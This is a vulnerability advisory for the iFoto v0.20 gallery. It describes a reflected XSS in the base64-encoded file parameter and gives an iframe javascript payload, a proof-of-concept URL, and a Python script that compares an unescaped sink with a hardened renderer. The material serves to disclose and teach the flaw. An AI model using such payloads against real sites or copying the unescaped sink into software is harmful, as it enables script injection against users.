iFoto v0.20-06/06/06

Homepage:
http://ifoto.ireans.com/

Affected files:

XSS Vulnerability:

The name of the image to display (the file parameter) is passed base64-encoded, so to reproduce this XSS the payload is base64-encoded before it is placed in the URL.

The payload used here is JavaScript in an iframe tag: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

http://www.example.com/?dir=Scene&file=PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+

The file value above decodes to exactly the iframe tag. Note that base64 output can contain '+' and '/'; a bare '+' in a query string is decoded as a space by the server, so percent-encode the parameter ('+' as %2B, '/' as %2F) when submitting it.
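As an added worked example (not part of the original advisory, and not iFoto's own code), the Python script below reproduces the encoding step, shows how the parameter has to be URL-encoded to survive query-string parsing, and contrasts a hypothetical unescaped sink with a hardened one that allow-lists the decoded filename and HTML-escapes it on output. The render_vulnerable/render_hardened functions and the SAFE_NAME pattern are assumptions for illustration only; nothing here is taken from iFoto's source.

```python
import base64
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Payload quoted in the advisory and the base64 string from its example URL.
PAYLOAD = '<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>'
ADVISORY_B64 = "PElGUkFNRSBTUkM9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpOyI+PC9JRlJBTUU+"

# Filenames the hardened renderer accepts (an assumption for this example):
# must start with a letter or digit, so '.', '..' and anything with '/' or
# markup characters is rejected.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")


def encode_file_param(value: str) -> str:
    """Base64-encode a value for the gallery's file parameter."""
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def decode_file_param(value: str) -> str:
    """Decode the file parameter; tolerates stripped '=' padding."""
    padded = value + "=" * (-len(value) % 4)
    return base64.b64decode(padded).decode("utf-8", errors="replace")


def build_poc_url(base: str, directory: str, payload: str) -> str:
    """Build the proof-of-concept URL with proper query-string encoding.

    urlencode percent-encodes '+' and '/', which base64 output can contain;
    a raw '+' in a query string would be decoded as a space server-side.
    """
    query = urlencode({"dir": directory, "file": encode_file_param(payload)})
    return f"{base}?{query}"


def file_param_from_url(url: str) -> str:
    """What a server-side query parser hands the application for 'file'."""
    return parse_qs(urlsplit(url).query)["file"][0]


def render_vulnerable(directory: str, file_param: str) -> str:
    """Hypothetical reconstruction of the bug class (not iFoto's code):
    the decoded name is written into the page with no validation or escaping."""
    name = decode_file_param(file_param)
    return f'<img src="{directory}/{name}"><p>{name}</p>'


def is_safe_name(name: str) -> bool:
    """Allow-list check on the decoded filename."""
    return SAFE_NAME.fullmatch(name) is not None


def render_hardened(directory: str, file_param: str) -> str:
    """Validate the decoded value, then HTML-escape everything written to the page."""
    name = decode_file_param(file_param)
    if not is_safe_name(name):
        raise ValueError(f"rejected file parameter: {name!r}")
    safe_dir, safe_name = html.escape(directory), html.escape(name)
    return f'<img src="{safe_dir}/{safe_name}"><p>{safe_name}</p>'


if __name__ == "__main__":
    url = build_poc_url("http://www.example.com/", "Scene", PAYLOAD)
    print("PoC URL:         ", url)
    param = file_param_from_url(url)
    print("server sees:     ", param)
    print("vulnerable output:", render_vulnerable("Scene", param))
    try:
        render_hardened("Scene", param)
    except ValueError as exc:
        print("hardened output: ", exc)
    print("hardened, legit: ", render_hardened("Scene", encode_file_param("beach.jpg")))
```

Base64 is an encoding, not a security control: anything the application decodes from the request is still attacker-controlled and has to be validated before use and escaped for the context it is written into.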
